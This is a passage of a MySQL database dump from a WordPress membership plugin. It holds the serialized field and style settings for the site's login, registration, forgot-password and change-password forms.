me\";s:8:\"meta_key\";s:10:\"rememberme\";s:8:\"required\";i:0;s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(85,102,4,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:5:\"LOGIN\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(86,103,1,'user_login','a:9:{s:2:\"id\";s:10:\"user_login\";s:5:\"label\";s:25:\"Username OR Email Address\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:8:\"meta_key\";s:10:\"user_login\";s:8:\"required\";i:1;s:13:\"blank_message\";s:31:\"Username can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid username.\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(87,103,2,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(88,104,2,'user_pass','a:12:{s:2:\"id\";s:9:\"user_pass\";s:5:\"label\";s:12:\"New Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:1;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:6;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:1;s:7:\"numeric\";i:1;s:9:\"uppercase\";i:1;s:9:\"lowercase\";i:1;}s:8:\"meta_key\";s:9:\"user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:31:\"Password can not be left blank.\";s:15:\"invalid_message\";s:28:\"Please enter valid password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2023-03-28 07:20:18'),(89,104,3,'repeat_pass','a:12:{s:2:\"id\";s:11:\"repeat_pass\";s:5:\"label\";s:16:\"Confirm Password\";s:11:\"placeholder\";s:0:\"\";s:4:\"type\";s:11:\"repeat_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:11:\"repeat_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Confirm Password can not be left blank.\";s:15:\"invalid_message\";s:22:\"Passwords don\'t match.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:88;s:19:\"enable_repeat_field\";i:0;}',0,1,'2023-03-28 07:20:18'),(90,104,3,'','a:4:{s:2:\"id\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:4:\"type\";s:6:\"submit\";s:13:\"default_field\";i:1;}',0,1,'2023-03-28 07:20:18'),(91,4,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(92,4,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(93,8,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(94,8,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(95,12,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(96,12,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(97,16,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(98,16,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(99,20,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(100,20,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(101,104,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42'),(102,104,1,'current_user_pass','a:12:{s:2:\"id\";s:17:\"current_user_pass\";s:5:\"label\";s:16:\"Current Password\";s:11:\"placeholder\";s:16:\"Current Password\";s:4:\"type\";s:17:\"current_user_pass\";s:7:\"options\";a:8:{s:14:\"strength_meter\";i:0;s:15:\"strong_password\";i:0;s:9:\"minlength\";i:0;s:9:\"maxlength\";s:0:\"\";s:7:\"special\";i:0;s:7:\"numeric\";i:0;s:9:\"uppercase\";i:0;s:9:\"lowercase\";i:0;}s:8:\"meta_key\";s:17:\"current_user_pass\";s:8:\"required\";i:1;s:13:\"blank_message\";s:39:\"Current password can not be left blank.\";s:15:\"invalid_message\";s:36:\"Please enter valid current password.\";s:13:\"default_field\";i:1;s:12:\"ref_field_id\";i:0;s:19:\"enable_repeat_field\";i:0;}',0,1,'2024-02-27 05:05:42');
/*!40000 ALTER TABLE `wp_arm_form_field` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_arm_forms`
--

DROP TABLE IF EXISTS `wp_arm_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_arm_forms` (
  `arm_form_id` int(11) NOT NULL AUTO_INCREMENT,
  `arm_form_label` varchar(255) DEFAULT NULL,
  `arm_form_title` varchar(255) DEFAULT NULL,
  `arm_form_type` varchar(100) DEFAULT NULL,
  `arm_form_slug` varchar(255) DEFAULT NULL,
  `arm_is_default` int(1) NOT NULL DEFAULT 0,
  `arm_set_name` varchar(255) DEFAULT NULL,
  `arm_set_id` int(11) NOT NULL DEFAULT 0,
  `arm_is_template` int(11) NOT NULL DEFAULT 0,
  `arm_ref_template` int(11) NOT NULL DEFAULT 0,
  `arm_form_settings` longtext DEFAULT NULL,
  `arm_form_updated_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `arm_form_created_date` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  PRIMARY KEY (`arm_form_id`)
) ENGINE=InnoDB AUTO_INCREMENT=105 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_arm_forms`
--

LOCK TABLES `wp_arm_forms` WRITE;
/*!40000 ALTER TABLE `wp_arm_forms` DISABLE KEYS */;
INSERT INTO `wp_arm_forms` VALUES (1,'Template 1','Please Signup','template','template-registration',1,'Template 1',0,1,1,'a:7:{s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:10:\"auto_login\";s:1:\"1\";s:5:\"style\";a:76:{s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:19:\"form_padding_bottom\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:27:\"registration_link_type_page\";i:2043;s:30:\"forgot_password_link_type_page\";i:2045;}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(2,'Please Login','Please Login','template','template-login',1,'Template 1',-1,1,1,'a:17:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:61:\"<center>Dont have account? [ARMLINK]SIGNUP[/ARMLINK]</center>\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:18:\"Lost Your Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"315\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";i:0;s:6:\"bottom\";i:0;s:4:\"left\";i:0;s:5:\"right\";i:0;}s:5:\"style\";a:81:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(3,'Forgot Password','Forgot Password','template','template-forgot-password',1,'Template 1',-1,1,1,'a:18:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:61:\"<center>Dont have account? [ARMLINK]SIGNUP[/ARMLINK]</center>\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:18:\"Lost Your Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"315\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";i:0;s:6:\"bottom\";i:0;s:4:\"left\";i:0;s:5:\"right\";i:0;}s:5:\"style\";a:81:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:11:\"description\";s:50:\"Please enter your email address or username below.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(4,'Change Password','Change Password','template','template-change-password',1,'Template 1',-1,1,1,'a:19:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:61:\"<center>Dont have account? [ARMLINK]SIGNUP[/ARMLINK]</center>\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:18:\"Lost Your 